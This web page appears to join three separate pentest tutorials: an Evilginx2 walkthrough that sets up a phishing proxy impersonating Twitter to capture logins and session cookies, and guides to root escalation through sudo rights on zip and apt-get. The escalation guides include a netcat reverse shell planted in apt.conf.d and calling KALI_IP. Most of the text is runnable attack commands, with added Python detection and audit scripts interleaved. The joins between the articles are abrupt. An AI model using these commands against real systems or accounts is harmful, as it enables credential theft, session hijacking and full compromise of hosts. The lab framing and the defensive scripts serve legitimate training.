Evilginx2 - Advanced Phishing Attack Framework


Evilginx2 is the successor of Evilginx 1 and stays in the same man-in-the-middle (MITM) lineage. The tool is designed for phishing attacks that capture login credentials together with the authenticated session cookies, so the attacker can replay a logged-in session rather than just the password.

Table of Contents
Overview
Setup
·        Prerequisites
·        Installation
·        Domain Setup
·        Priming Evilginx
Execution
·        Lure Creation
·        Attack Simulation
Overview
One of the biggest concerns in today's cyber space is phishing; it turns what a user is familiar with against them. Evilginx2 is a MITM attack framework that sits between the user and the site they are trying to reach and proxies the real login page, so it can capture their credentials and session cookies in transit. The framework is written in Go and implements its own HTTP and DNS servers, which keeps the setup simple.
Setup
Let's get acquainted with Evilginx2. The first thing we need to do is set up the Evilginx2 application on our attacking machine. Start by noting the machine's IP address; the DNS records created later must point at it.
ifconfig



Prerequisites
Evilginx has a few requirements before it can be installed and work properly, so let's take care of them first.
We use pscp to upload the Go tarball to our attacking machine, giving the local path of the file and the credentials and IP of the destination machine. Go is a prerequisite for building Evilginx2; Go 1.10.0 is used here.

pscp.exe c:\go1.10.linux-amd64.tar.gz root@68.183.85.197:/tmp/go1.10.linux-amd64.tar.gz



Once Go is on the machine we unpack and install it. pscp deposited the Go tarball in /tmp. The following commands install Go under /usr/local and check the version:
cd /tmp/
ls
tar -C /usr/local -xzf go1.10.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
source $HOME/.profile
go version



Go also has to be added to ~/.profile so that it stays on the PATH after a new login. Open ~/.profile in nano or any other text editor and append the following:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
 


Next, install git and make, which the Evilginx2 build needs:
apt-get install git make



Installation
Now we are ready to install Evilginx2. Fetch the source into the GOPATH and build it:
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make
make install



Let's launch Evilginx2. It runs its own DNS and HTTP(S) servers and must bind ports 53, 80 and 443, so it has to be started as root:
./evilginx



Evilginx2 ships with several built-in site templates, called phishlets, from which the attacker chooses the site to impersonate.



Domain Setup
Evilginx works as a relay between the victim and the legitimate website they are trying to access. To achieve this the attacker needs a domain of their own. There are plenty of web resources from which a free domain can be obtained temporarily, and we used one of them. Our attacking domain is userid.cf.



At the registrar the nameserver for the domain is pointed at the IP of our attacking machine, which we noted earlier, so that Evilginx's built-in DNS server answers queries for the domain.



Priming Evilginx
This is the part where we prime Evilginx for the attack. At the Evilginx terminal we use the help command to see the various general configuration options that it has.
help



We need to configure Evilginx to use the domain name that we have set up for it and the IP for the attacking machine.
config domain userid.cf
config ip 68.183.85.197



Time to set up the hostnames. We attach the twitter phishlet to our domain, and Evilginx then lists the exact hostnames it expects to serve so that we can create them at our DNS hosting site:
phishlets hostname twitter twittwer.com.userid.cf
phishlets get-hosts twitter



At our hosting site we create an A record for each hostname listed by get-hosts, pointing at the IP of the attacking machine. Note that only the part preceding "userid.cf" is entered as the record name; the zone already supplies the rest.
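The hostnames Evilginx builds for a phishlet all put the impersonated site's name in front of the attacker's registrable domain (something like twitter.com.userid.cf, never anything under twitter.com itself), which is a shape defenders can look for in proxy logs or user-reported URLs. The following Python check is an added example and not part of Evilginx2 or the original write-up; the protected brand list, the sample URLs and the tiny public-suffix table are assumptions made for the example, and a production version would use the Public Suffix List and the organisation's own brand inventory.

```python
# Added example (not Evilginx2 code, not from the original write-up).
# Flags hostnames where a protected brand domain, or a one-character
# typo of it, appears as a run of labels in front of a *different*
# registrable domain, e.g. twitter.com.userid.cf or twittwer.com.userid.cf.
from urllib.parse import urlsplit

# Assumed: the domains we want to protect. A real deployment loads its own list.
PROTECTED_DOMAINS = ("twitter.com", "linkedin.com")

# Assumed: a minimal stand-in for the Public Suffix List so that
# "example.co.uk" is treated as one registrable domain.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.in"}


def registrable_domain(host: str) -> str:
    """Return the registrable (eTLD+1) part of a hostname,
    e.g. 'twitter.com.userid.cf' -> 'userid.cf'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def impersonated_brand(host: str):
    """Return the protected domain that `host` impersonates, or None.

    A host that really belongs to the brand's own zone (www.twitter.com)
    is never flagged; a brand name sitting in front of someone else's
    registrable domain is.
    """
    host = host.lower().rstrip(".")
    labels = host.split(".")
    for brand in PROTECTED_DOMAINS:
        if host == brand or host.endswith("." + brand):
            continue  # genuinely under the brand's own zone
        n = len(brand.split("."))
        # slide a window of n labels over the hostname and compare it to the brand
        for i in range(len(labels) - n + 1):
            window = ".".join(labels[i:i + n])
            if levenshtein(window, brand) <= 1:
                return brand
    return None


def classify_url(url: str) -> dict:
    """Classify a lure-style URL: host, its registrable domain and the
    brand it impersonates (None when it looks legitimate)."""
    host = urlsplit(url).hostname or ""
    return {
        "host": host,
        "registrable": registrable_domain(host),
        "impersonates": impersonated_brand(host),
    }


if __name__ == "__main__":
    # Constructed sample URLs; the last two are shaped like the hostnames
    # the phishlet produces for the configured domain.
    for u in ("https://www.twitter.com/login",
              "https://twitter.com.userid.cf/login?o=abc",
              "https://api.twittwer.com.userid.cf/1.1/account.json"):
        print(classify_url(u))
```

The check deliberately ignores the registrar's choice of TLD and only asks where the brand's labels sit relative to the registrable domain, which is exactly what the get-hosts output above reveals: every hostname ends in the attacker's zone.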



Execution
We now have everything we need to execute the attack with Evilginx.
With the configuration in place we enable the phishlet, which makes Evilginx obtain a TLS certificate for its hostnames and start serving the proxied site:
phishlets enable twitter



Lure Creation
We now need a link for the victim to click; in Evilginx these links are called lures.
The help command shows us what options we must use for setting up the lures.
help lures



A lure is attached to the phishlet we want to use, and a redirect_url is set so that, once the victim's credentials and session tokens have been captured, they are forwarded to the legitimate website and notice nothing unusual. After configuring the lure we can list it and get the URL to send to the victim:
lures
lures create twitter
lures edit redirect_url 0 https://www.twitter.com
lures
lures get-url 0



Attack Simulation
When a victim clicks on our lure they are sent to our phishlet, which proxies the real login page, as can be seen below.



The victim enters their credentials and we see Evilginx capture them, along with the session cookies, and print them in the console on the attacking machine.
Evilginx2 is a great tool for exploring and understanding phishing, but be sure to use it only in a controlled setting against accounts you are authorised to test.



Linux for Pentester : ZIP Privilege Escalation


Today we are going to show how privilege escalation can be performed with the zip command. Zip is a file packaging and compression utility available on Unix-like systems such as Linux as well as on Windows; the zip program is used for compressing and packaging documents.

Table of content 
Introduction to ZIP
Major functions of ZIP command
Sudo Rights Lab setups for privilege Escalation
Exploiting Sudo rights

Introduction to ZIP
Zip is helpful for packaging a number of distribution files, for archiving, and for saving disk space by temporarily compressing unused files or directories. A whole directory structure can be packed into a single archive with one command, and for text files a 2:1 to 3:1 compression ratio is commonplace. But that's not all; let's think outside the box and try something less obvious: privilege escalation with the zip command. To understand how, we first look at what the zip command does in Linux.

Major Operations Performed Using ZIP command
First we run zip -h, the help option, which lists all the options available in the zip command, as shown in the picture below.
zip -h


Our first step is to make a directory named Ignite and create some text files in it with the touch command.
As you can see, we have created three text files named file1.txt, file2.txt and file3.txt in the Ignite folder. Now we zip file1.txt and file3.txt into an archive: the zip command takes the archive name (file.zip) followed by the files to add.
zip file.zip file1.txt file3.txt
After this step we use ls -la to list the files and confirm that file.zip has been created.


Delete with -d option
The -d option deletes a file from the archive. After generating the zip file we can remove file3.txt from it with -d; the archive name comes first, then the entry to delete.
zip -d file.zip file3.txt


Update with -u option
You will notice that file3.txt has been deleted from file.zip. Now we want to update the archive and add another file directly into it, for which we use the -u option:
zip -u file.zip file2.txt
With the above command file2.txt is added directly into the archive file.zip.
Move Multiple files with -m option
Now we create files with different extensions in the Ignite directory: two .txt, two .pdf and two .jpg files. To move files into a zip archive, deleting the originals afterwards, we use the -m option. Here we move all text files into the archive:
zip -m 1.zip *.txt
ls -la confirms that all the .txt files are now inside the archive and have been removed from their original location, which shows the move succeeded. The same can be done for the pdf and jpg files to move them into 1.zip as well.


Execute system command using zip
You might not have thought of what else zip can do. Zip can be made to run any Linux command, as follows. First we create a text file with touch as above; the file named raj.txt is created. The -T option tells zip to test the finished archive by invoking unzip, and --unzip-command lets us replace the unzip command with anything we choose, so the command we supply is executed by zip:
zip 1.zip raj.txt -T --unzip-command="sh -c ifconfig"
As you can see, the system command is executed through the zip command.


Exploiting Zip
Sudo Rights Lab setups for privilege Escalation
The behaviour of zip changes when it runs with higher privileges. Suppose the system administrator has given a local user sudo permission to run zip. This can lead to privilege escalation once the system is compromised. So here we add the test user to the sudoers file so that test can run the zip command as root via sudo.


Now imagine getting a privileged shell on the victim's machine by exploiting the zip program. It sounds far-fetched but is very easy to perform. First, from Kali's terminal, connect to the Ubuntu machine over ssh as shown below.
Well done, we have connected through ssh successfully.
Now we run sudo -l to list the sudo rights of the current user. In the list we can see that test can run the zip program as root.
Let's exploit!
First we create a file with touch, as we did with raj.txt, then we compress it with sudo zip and use the -T/--unzip-command trick to have zip spawn a shell. Because zip runs as root, so does the shell:
sudo zip 1.zip raj.txt -T --unzip-command="sh -c /bin/bash"
We have now obtained a root shell on the victim's machine through the zip command.

Linux for Pentester : APT Privilege Escalation


In this article we'll talk about APT (apt-get) functionality, learn how useful the apt command is in Linux penetration testing, and see how apt can be abused to obtain a higher-privileged shell.

Table of content

Introduction to APT (apt-get)
·         Major Operation performed using APT (apt-get)
Exploiting APT (apt-get)
·         Sudo Rights Lab setups for privilege Escalation
·         Exploiting Sudo rights: Method -I
·         Exploiting Sudo rights: Method -II
·         Exploiting Sudo rights: Method -III
·         Exploiting Cron job

Introduction to APT (apt-get)
The apt command is a powerful command-line tool that works with Ubuntu's Advanced Packaging Tool (APT), performing functions such as installing new software packages, upgrading existing packages, updating the package list index, and even upgrading the entire Ubuntu system.
apt records its own actions in /var/log/apt/history.log, and the package installations and removals it performs through dpkg are logged in /var/log/dpkg.log.
For further information about the use of APT type:
apt-get -h


Major Operation performed using APT (apt-get)
·         Update the Package: The APT package index is essentially a database of available packages from the repositories defined in the /etc/apt/sources.list file and in the /etc/apt/sources.list.d directory. To update the local package index with the latest changes made in the repositories, type the following:
apt update
·         Upgrade Packages: Over time, updated versions of packages currently installed on your computer may become available from the package repositories (for example security updates). To upgrade your system, first update your package index as outlined above, and then type:
apt upgrade
apt dist-upgrade


·         Install a Package: installing packages with the apt tool is straightforward. For example, to install openssh-server, type the following:
apt-get install openssh-server
·         Uninstall a package: the remove command uninstalls a software package but keeps its configuration files.
apt-get remove openssh-server
·         Remove a package with its configuration: to remove a software package including its configuration files, use the purge sub-command as shown below.
apt-get purge openssh-server


Exploiting APT (apt-get)
Sudo Rights Lab setups for privilege Escalation
The behaviour of apt-get changes when it runs with higher privileges. Suppose the system administrator has given a local user sudo permission to run apt-get. This can lead to privilege escalation once the system is compromised.
First of all, let's revise what sudo permission is.
In Linux/Unix, the sudoers file in /etc is the configuration file for sudo rights. The word sudo stands for "superuser do": it lets a permitted user run a command as root or as another user. The sudoers file records which users and groups may run some or all commands with those privileges.


So here we give the test user sudo privilege to run apt-get as root. To add the right, open /etc/sudoers with visudo and add the following line under the user privilege specification:
test        ALL=(ALL) NOPASSWD: /usr/bin/apt-get


Exploiting Sudo rights: Method -I
Let's exploit apt-get by abusing the sudo right. Suppose we have local user access to the target system and want to escalate to root.
First we connect to the target machine with ssh and log in as the local user:
ssh test@192.168.1.108
Then we check the sudo rights of the "test" user (if any) and find that "test" can execute apt-get as root without a password:
sudo -l
To exploit this we run the following command. APT::Update::Pre-Invoke is a hook that apt-get runs before refreshing the package lists, so setting it with -o on the command line makes apt-get, running as root, invoke bash for us, as shown in the image below.
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash


Exploiting Sudo rights: Method-II  
We can also use apt-get to view the changelog of a package. The following command opens the changelog in a pager (less, as with man pages):
sudo apt-get changelog apt

With the changelog open in the pager we can type "!/bin/sh" and press Enter; less runs the command, and since the pager was started by root via sudo, the shell is root's.


You get "#" shell that means that we successfully escalated the root shell, as shown in the following picture.


Exploiting Sudo rights:  Method-III
Instead of passing the hook on the command line, we can write it into a temporary apt configuration file and hand that file to apt-get with -c. The DPkg::Pre-Invoke hook runs before dpkg is invoked, so it fires when we ask apt-get to install a package (sl here). The trailing "false" makes the hook fail once the shell exits, so apt-get aborts instead of completing the install:
TF=$(mktemp)
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
sudo apt-get install -c $TF sl
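Both the zip escalation earlier and the three apt-get methods above start from the same observation in the sudo -l output: a binary with a built-in command-execution feature is runnable as root, often with NOPASSWD. The following Python script is an added example and not from the original write-ups; it parses a constructed sudo -l listing in the format sudo prints on Ubuntu and reports which entries can be turned into a root shell with the one-liners shown on this page. The sample output and the hint table are assumptions made for the example and cover only the binaries discussed here.

```python
# Added example (not from the original write-ups): parse `sudo -l` output
# and flag binaries that this page shows can be abused for a root shell.
import re

# Constructed sample of `sudo -l` output, in the layout sudo uses on Ubuntu.
SAMPLE_SUDO_L = """\
Matching Defaults entries for test on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User test may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/apt-get
    (root) NOPASSWD: /usr/bin/zip
    (ALL : ALL) /usr/bin/less
    (ALL) /bin/ls
"""

# Assumed table: only the binaries demonstrated on this page, each with the
# one-liner from the page that turns the sudo right into a root shell.
ESCALATION_HINTS = {
    "zip": "sudo zip /tmp/x.zip /etc/hostname -T --unzip-command='sh -c /bin/bash'",
    "apt-get": "sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash",
    "apt": "sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash",
}

# One command entry: "(runas) TAG: TAG: /path/to/cmd args"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"   # (ALL) or (root : root)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"      # NOPASSWD: SETENV: ... (may be empty)
    r"(?P<cmd>\S.*?)\s*$"             # the command specification
)


def parse_sudo_l(text: str) -> list:
    """Return (runas, tags, command) tuples for every entry listed after the
    'may run the following commands' line. Defaults entries are skipped."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        entries.append((m.group("runas").strip(), tags, m.group("cmd")))
    return entries


def find_escalations(text: str) -> list:
    """Return the entries whose binary is in ESCALATION_HINTS and which may be
    run as root (runas user ALL or root), with the matching one-liner."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        # "(ALL : ALL)" -> user part "ALL"; "(root)" -> "root"
        runas_user = runas.split(":")[0].strip()
        if runas_user not in ("ALL", "root"):
            continue
        # sudoers may list arguments after the path: "/usr/bin/zip *"
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in ESCALATION_HINTS:
            findings.append({
                "binary": binary,
                "spec": cmd,
                "nopasswd": "NOPASSWD" in tags,
                "hint": ESCALATION_HINTS[binary],
            })
    return findings


if __name__ == "__main__":
    for f in find_escalations(SAMPLE_SUDO_L):
        flag = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"{f['spec']} ({flag}) -> {f['hint']}")
```

On a real engagement the input would be the live output of sudo -l; on the defensive side the same parser can be pointed at the output of sudo -l -U for each account to find rights that should never have been granted.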


Crontab Lab setups for privilege Escalation

This scenario assumes that /etc/apt/apt.conf.d is writable and that a cron job runs apt-get update to refresh the package lists. For the lab we give apt.conf.d full permissions:
chmod 777 apt.conf.d
ls -al

Then we schedule the update to run every 2 minutes through the system crontab (/etc/crontab format, which carries a user field), as shown in the image below:
*/2 * * * * root apt-get update


Exploiting Cron job
Let's exploit apt-get by abusing the cron job; as we know, jobs in /etc/crontab run as root. Suppose we have a limited shell on the target system locally and want to escalate to root.
First we connect to the target machine over ssh as the low-privileged user.

We know apt.conf.d has full permissions in the lab setup (you can check for writable directories yourself with the find command). Any file placed in that directory is read by apt-get as configuration, so we create a malicious file inside apt.conf.d whose Pre-Invoke hook is a netcat reverse shell:

echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 1234 >/tmp/f"};' > pwn


Start a netcat listener on the attacker's machine and wait up to 2 minutes. The apt-get update task is scheduled every 2 minutes through crontab and runs as root, so it reads our pwn file and executes the netcat backdoor, giving us a root reverse shell as depicted in the image.
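The cron-job attack depends on two conditions that are easy to audit from the defensive side: apt.conf.d (or a file inside it) being writable by other users, and a Pre-Invoke or Post-Invoke hook being present in the configuration, the same hooks Method I and Method III relied on. The Python audit below is an added example and not part of the original write-up; it rebuilds the lab's world-writable apt.conf.d inside a temporary directory with a placeholder hook command in place of the reverse shell, and the file names and contents are assumptions made for the example.

```python
# Added example (not from the original write-up): audit an apt.conf.d
# directory for world-writable paths and for *-Invoke hooks, the two
# conditions the cron-job escalation above relies on.
import os
import re
import stat
import tempfile

# APT::Update::Pre-Invoke, APT::Update::Post-Invoke-Success,
# DPkg::Pre-Invoke, DPkg::Post-Invoke. apt matches these case-insensitively.
HOOK_RE = re.compile(
    r"\b(?:APT::Update::|DPkg::)(?:Pre|Post)-Invoke(?:-Success)?\b", re.I)


def world_writable(path: str) -> bool:
    """True when the 'other' write bit is set (what chmod 777 grants)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_apt_conf_dir(conf_dir: str) -> dict:
    """Return world-writable paths and (file, line number, text) of every
    *-Invoke hook found in the apt configuration fragments in conf_dir."""
    findings = {"writable": [], "hooks": []}
    if world_writable(conf_dir):
        findings["writable"].append(conf_dir)
    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        if not os.path.isfile(path):
            continue
        if world_writable(path):
            findings["writable"].append(path)
        with open(path, errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                code = line.split("//", 1)[0]  # drop apt-style // comments
                if HOOK_RE.search(code):
                    findings["hooks"].append((path, lineno, code.strip()))
    return findings


def build_lab(root: str) -> str:
    """Recreate the lab from the write-up under root: a chmod 777 apt.conf.d
    holding one benign fragment and a 'pwn' fragment with a Pre-Invoke hook.
    The hook command is an assumed placeholder, not the reverse shell."""
    conf_dir = os.path.join(root, "apt.conf.d")
    os.mkdir(conf_dir)
    benign = os.path.join(conf_dir, "01autoremove")
    with open(benign, "w") as fh:
        fh.write('APT::NeverAutoRemove { "^firmware-linux.*"; };\n')
    pwn = os.path.join(conf_dir, "pwn")
    with open(pwn, "w") as fh:
        fh.write('apt::Update::Pre-Invoke {"/tmp/payload.sh"};\n')
    os.chmod(benign, 0o644)
    os.chmod(pwn, 0o644)
    os.chmod(conf_dir, 0o777)  # the chmod 777 from the lab setup
    return conf_dir


def run_demo() -> dict:
    """Build the lab in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        return audit_apt_conf_dir(build_lab(root))


if __name__ == "__main__":
    result = run_demo()
    for p in result["writable"]:
        print("world-writable:", p)
    for path, lineno, text in result["hooks"]:
        print(f"hook in {path}:{lineno}: {text}")
```

Pointed at the real /etc/apt/apt.conf.d, the same function lists any fragment that carries a hook, which on a stock system should be none outside of packaging-tool integrations the administrator knows about.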

